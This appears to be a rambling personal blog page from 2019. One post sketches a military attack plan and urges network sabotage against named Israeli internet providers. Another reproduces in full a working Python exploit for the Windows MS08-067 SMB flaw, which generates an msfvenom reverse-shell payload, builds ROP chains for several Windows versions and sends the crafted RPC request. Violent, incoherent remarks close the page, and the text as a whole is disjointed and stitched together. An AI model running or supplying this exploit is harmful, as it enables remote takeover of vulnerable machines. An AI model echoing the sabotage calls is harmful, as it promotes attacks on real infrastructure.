Saturday, September 14, 2019

surprise factor ///warfare folder....attack Iran vs US

remove a mine from a oil tanker full with methanol, as a normal operation of security...get close the oil tanker from a US or UK navy ship, so it can kill...then acidentally exploded it...as soon as they show up with drones, light laser crossing the skyp, the areas they want to erase...and then hit with missiles strike...after one! hit of them on your soil....2 naval ships...choose the ones that will block the F16s from flying over your coast bcz of the smoke, both north and south cardinals

 strike Israel with sabotage port 1028 TCP, where they have all their firewalls..forget Elbit ...strike ...hit
Hot-Net internet services Ltd.
Cellcom Fixed Line Communication L.P.
Bezeq International-Ltd

Friday, September 13, 2019

2019 SEH Buffer Overflow Exploit drones attack hack folder


@thel3l thel3l/ms08-067-fixed.py
Created last year

Updated MS08-067 exploit without custom netcat listener (the reverse-shell payload is generated with msfvenom; catch it with a multi/handler as printed at the end).
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified version of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct
import time
import sys
import subprocess # Added to integrate msfvenom payload generation functionality
from threading import Thread #Thread is imported incase you would like to modify
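try:
    # smb and dcerpc are imported for parity with the original script; only
    # uuid and transport are used by the code visible in this file.
    from impacket import smb
    from impacket import uuid
    from impacket import dcerpc
    from impacket.dcerpc.v5 import transport
except ImportError:
    # `except ImportError, _:` is Python 2-only syntax; this form is accepted by
    # both Python 2 and 3, which matters now that /usr/bin/python is usually 3.
    # NOTE(review): the oss.coresecurity.com URL below appears to be historical;
    # impacket has since moved to GitHub -- confirm before pointing users at it.
    print('Install the following library to make this script work')
    print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
    print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
    sys.exit(1)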
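if __name__ == '__main__':
    # Positional arguments: <target> <os selector 1-7> <lhost> <lport>.
    # All four stay module globals because the payload generation and the
    # SRVSVC_Exploit(target, os) launch further down read them by name.
    try:
        target = sys.argv[1]
        # Target-OS selector. This deliberately keeps the original name `os`,
        # so it shadows the os module: nothing in this script may `import os`.
        os = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
    except IndexError:
        print('')
        print(' ____________________________________________')
        print(' | |')
        print(' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |')
        print(' | Based On Ported MSF Exploit By EKOZ |')
        print(' |____________________________________________|')
        print(' | |')
        print(' | USAGE |')
        # The argument placeholders were lost from this banner (angle brackets
        # swallowed on extraction); restored from the example line and the
        # four argv reads above.
        print(' | MS08-067.py <target> <os> <lhost> <lport> |')
        print(' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |')
        print(' |____________________________________________|')
        print(' | |')
        print(' | TARGET OS SELECTION |')
        print(' | 1 = Windows XP SP0/SP1 Universal |')
        print(' | 2 = Windows 2000 Universal |')
        print(' | 3 = Windows 2003 SP0 Universal |')
        print(' | 4 = Windows 2003 SP1 English |')
        print(' | 5 = Windows XP SP3 French (NX) |')
        print(' | 6 = Windows XP SP3 English (NX) |')
        print(' | 7 = Windows XP SP3 English (AlwaysOn NX) |')
        print(' |____________________________________________|\r\n')
        print(' I suggest you use a stageless payload to avoid issues with the handler.')
        sys.exit(-1)
    # Fail fast on a bad selector or port. The original only noticed an
    # unsupported selector inside the exploit thread, after msfvenom had
    # already run, and never checked LPORT at all.
    if os not in ('1', '2', '3', '4', '5', '6', '7'):
        print('[!] ERROR: target OS must be a number from 1 to 7 (see usage)')
        sys.exit(-1)
    if not lport.isdigit() or not 0 < int(lport) < 65536:
        print('[!] ERROR: LPORT must be a TCP port number (1-65535)')
        sys.exit(-1)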
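# badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
# Make sure there are enough nops at the beginning for the decoder to work. Payload size: 380 bytes
# EXITFUNC=thread Important!
# msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
# Auto Generate Reverse Shell Payload Using msfvenom
if __name__ == '__main__':
    # Argument vector handed to msfvenom directly (no shell involved). The
    # original built one string and .split() it, which passed the literal
    # single quotes around the bad-char list to msfvenom as part of the -b
    # value. The "\x00..." escapes are passed as text; msfvenom decodes them.
    mksh = [
        "msfvenom",
        "-p", "windows/shell_reverse_tcp",
        "-b", "\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40",
        "-e", "x86/call4_dword_xor",
        "EXITFUNC=thread",
        "--nopsled=32",
        "LHOST=" + lhost,
        "LPORT=" + lport,
        "-f", "python",
        "-a", "x86",
        "-o", "RevPld.py",
    ]
    print(' ____________________________________________')
    print(' | |')
    print(' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |')
    print(' | Based On Ported MSF Exploit By EKOZ |')
    print(' |____________________________________________|\r\n')
    print("[+] Attempting To Generate Reverse Shell Payload ...")
    try:
        vnm = subprocess.Popen(mksh, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # communicate() drains both pipes; a bare wait() with a PIPE can stall
        # once msfvenom fills the pipe buffer.
        out, err = vnm.communicate()
    except OSError as exc:
        # msfvenom missing from PATH / not executable. The original's bare
        # `except:` hid the reason.
        print("[!] ERROR: Couldn't Generate Payload ")
        print("[!] " + str(exc))
        sys.exit(-1)
    if vnm.returncode != 0:
        # The original never looked at the exit status: a failed msfvenom run
        # still printed "Generated Successfully" and then imported whatever
        # RevPld.py was left over from an earlier run (possibly built for a
        # different LHOST/LPORT), or crashed on the import.
        print("[!] ERROR: Couldn't Generate Payload ")
        sys.stderr.write(err.decode('utf-8', 'replace'))
        sys.exit(-1)
    print("[+] Reverse Shell Payload Generated Successfully...")
    # RevPld.py is executed as Python on import, and the working directory is
    # first on sys.path when running a script -- only run this from a
    # directory you control. `buf` is expected to be the bytes literal that
    # msfvenom's `-f python` output defines (TODO confirm on very old msfvenom,
    # which emitted a plain str).
    from RevPld import buf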
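# Building blocks for the jumper that follows the shellcode in the path.
# They are bytes literals so the same source runs on Python 2 (where b"" is
# str) and Python 3, where mixing these with struct.pack() output and the
# msfvenom `buf` would otherwise raise TypeError.
nops = b"\x90" * 30
# Non-NX targets (selectors 1-3, 5, 6): the two %s slots take two 4-byte
# addresses (return address twice, or NX-disable then return).
nonxjmper = b"\x08\x04\x02\x00%s" + b"A" * 4 + b"%s" + b"A" * 42 + b"\x90" * 8 + b"\xeb\x62" + b"A" * 10
# Windows 2003 SP1 (selector 4): four %s slots -- dec-ESI/ret x6, push/pop,
# NX-disable, jmp-ESP x2 -- filled in by SRVSVC_Exploit.
disableNXjumper = b"\x08\x04\x02\x00%s%s%s" + b"A" * 28 + b"%s" + b"\xeb\x02" + b"\x90" * 2 + b"\xeb\x62"
# Kept from the ported module; not referenced by the code in this file
# (selector 7 builds its chain with generate_rop instead).
ropjumper = b"\x00\x08\x01\x00" + b"%s" + b"\x10\x01\x04\x01"
# Image base that the selector-7 RVA table is relative to (which module this
# is, is not stated in the port -- treat as opaque).
module_base = 0x6f880000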
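def generate_rop(rvas, module_base=0x6f880000):
    """Assemble the ROP chain used for the 'AlwaysOn NX' target (selector 7).

    The chain is a fixed sequence of 19 little-endian dwords: a few constant
    values, gadget addresses resolved from *rvas*, and four inline 4-byte
    code stubs (gadget1, the three gadget2 slices, gadget3), in the order
    ported from the MSF ms08_067_netapi module.

    Args:
        rvas: mapping from gadget description to its RVA. Must contain the
            eight keys referenced below (the selector-7 table in
            SRVSVC_Exploit does).
        module_base: image base added to every RVA. The default is the value
            the script has always used, so the existing generate_rop(rvas)
            call is unchanged; it is a parameter so the chain can be tested
            or rebased without editing the function.

    Returns:
        bytes, always 76 bytes long.

    Raises:
        KeyError: a required gadget name is missing from rvas.

    NOTE: the struct.pack format strings had been lost on extraction
    (struct.pack('', v) raises struct.error). '<L' is restored here: every
    hand-packed address in this file is little-endian, e.g. "\\x9e\\x12\\x00\\x01"
    for 0x0100129e, so a little-endian unsigned dword is the only consistent
    reading.
    """
    def dword(value):
        return struct.pack('<L', value)

    def gadget(name):
        # Absolute address of a gadget from the RVA table.
        return dword(rvas[name] + module_base)

    gadget1 = b"\x90\x5a\x59\xc3"  # x86 decode: nop / pop edx / pop ecx / ret
    # One 12-byte stub split into the three 4-byte slots it is written through.
    gadget2 = [b"\x90\x89\xc7\x83", b"\xc7\x0c\x6a\x7f", b"\x59\xf2\xa5\x90"]
    gadget3 = b"\xcc\x90\xeb\x5a"  # x86 decode: int3 / nop / jmp +0x5a

    chain = [
        dword(0x00018000),
        gadget('call_HeapCreate'),
        dword(0x01040110),
        dword(0x01010101),
        dword(0x01010101),
        gadget('add eax, ebp / mov ecx, 0x59ffffa8 / ret'),
        gadget('pop ecx / ret'),
        gadget1,
        gadget('mov [eax], ecx / ret'),
        gadget('jmp eax'),
        gadget2[0],
        gadget2[1],
        gadget('mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'),
        gadget('pop ecx / ret'),
        gadget2[2],
        gadget('mov [eax+0x10], ecx / ret'),
        gadget('add eax, 8 / ret'),
        gadget('jmp eax'),
        gadget3,
    ]
    return b"".join(chain)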
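class SRVSVC_Exploit(Thread):
    """Worker thread that binds to the target's srvsvc interface and sends the crafted request.

    It is a Thread so the launching code can print the handler instructions
    while the connection is in flight (the launcher calls start() and does
    not join).

    Args:
        target: host used in the ncacn_np string binding.
        os: target selector '1'..'7' as listed in the usage banner; chooses
            the addresses or ROP chain appended after the shellcode.
        port: accepted for compatibility; it is stored but never applied --
            the string binding below leaves impacket on its default port.

    Module-level names read at run time (defined elsewhere in this script):
    nops, buf, nonxjmper, disableNXjumper, generate_rop, transport, uuid.
    All byte strings here are bytes literals so the class works on Python 3
    as well as 2; `buf` is assumed to be bytes too (msfvenom `-f python`).
    """

    def __init__(self, target, os, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target
        self.os = os

    def __jumper(self):
        """Return the jumper bytes for self.os, printing which target was chosen.

        An unknown selector prints a message and calls sys.exit(-1); inside a
        thread that only terminates this thread, so callers should validate
        the selector before starting the thread.
        """
        # Selectors whose jumper is nonxjmper % (ret, ret): label, ret.
        universal = {
            '1': ('Windows XP SP0/SP1 Universal', b"\x61\x13\x00\x01"),
            '2': ('Windows 2000 Universal', b"\xb0\x1c\x1f\x00"),
            '3': ('Windows 2003 SP0 Universal', b"\x9e\x12\x00\x01"),  # 0x0100129e
        }
        # Selectors whose jumper is nonxjmper % (disable_nx, ret): label, disable_nx, ret.
        nx_via_nonx = {
            '5': ('Windows XP SP3 French (NX)', b"\xc2\x17\x5c\x59", b"\x07\xf8\x5b\x59"),    # 0x595c17c2, 0x595bf807
            '6': ('Windows XP SP3 English (NX)', b"\xc2\x17\x89\x6f", b"\x07\xf8\x88\x6f"),   # 0x6f8917c2, 0x6f88f807
        }
        if self.os in universal:
            label, ret = universal[self.os]
            print('[+] Targeting : ' + label)
            return nonxjmper % (ret, ret)
        if self.os in nx_via_nonx:
            label, disable_nx, ret = nx_via_nonx[self.os]
            print('[+] Targeting : ' + label)
            return nonxjmper % (disable_nx, ret)  # the nonxjmper layout also works for these
        if self.os == '4':
            print('[+] Targeting : Windows 2003 SP1 English')
            ret_dec = b"\x8c\x56\x90\x7c"     # 0x7c90568c dec ESI, ret @SHELL32.DLL
            ret_pop = b"\xf4\x7c\xa2\x7c"     # 0x7ca27cf4 push ESI, pop EBP, ret @SHELL32.DLL
            jmp_esp = b"\xd3\xfe\x86\x7c"     # 0x7c86fed3 jmp ESP @NTDLL.DLL
            disable_nx = b"\x13\xe4\x83\x7c"  # 0x7c83e413 NX disable @NTDLL.DLL
            return disableNXjumper % (ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
        if self.os == '7':
            print('[+] Targeting : Windows XP SP3 English (AlwaysOn NX)')
            rvasets = {
                'call_HeapCreate': 0x21286,
                'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
                'pop ecx / ret': 0x2e796 + 6,
                'mov [eax], ecx / ret': 0xd296,
                'jmp eax': 0x19c6f,
                'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
                'mov [eax+0x10], ecx / ret': 0x10a56 + 6,
                'add eax, 8 / ret': 0x29c64,
            }
            return generate_rop(rvasets) + b"AB"
        print('[+] OS Version Not Supported\n')
        sys.exit(-1)

    def __DCEPacket(self):
        """Connect and bind to the target, then assemble self.__stub. Does not send."""
        jumper = self.__jumper()
        # The original printed the module-level `target` here; self.target is
        # the same value and does not depend on a global.
        print('[+] Initiating Connection To ' + self.target + ":445")
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        # Path argument: marker, filler, nop sled, shellcode, "\..\..\" in
        # UTF-16LE, then the jumper and a terminating wide NUL.
        path = (b"\x5c\x00" + b"ABCDEFGHIJ" * 10 + nops + buf
                + b"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00")
        path += b"\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + b"\x00" * 2
        server = (b"\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
                  b"\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00")
        prefix = b"\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
        self.__stub = (server + b"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path
                       + b"\xE8\x03\x00\x00" + prefix + b"\x01\x10\x00\x00\x00\x00\x00\x00")
        return

    def run(self):
        """Thread body: build the request, then call opnum 0x1f with the assembled stub."""
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)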
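if __name__ == '__main__':
    # Fire the exploit in its thread; the interpreter waits for the
    # non-daemon thread to finish after the instructions below are printed.
    current = SRVSVC_Exploit(target, os)
    current.start()
    print("Now start up a multi/handler with your payload options set to: ")
    print("payload windows/shell_reverse_tcp")  # seems to be the most stable and consistent.
    # Two spaces after the label: matches the output of the original
    # comma-separated Python 2 print.
    print("LHOST  " + lhost)
    print("LPORT  " + lport)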
    who bomb that nuclear bunker at Louisville,ZA mr H..was Ismael...the best IDF pilot. He was at a 6 months comission, and returned monday! Missed the biggest scene ever, since 1st september 1945. And he can kill you. So...think about a stollen egg...


    here we go again...back to war...another weekend A imagem pode conter: árvore, automóvel, céu, ar livre e natureza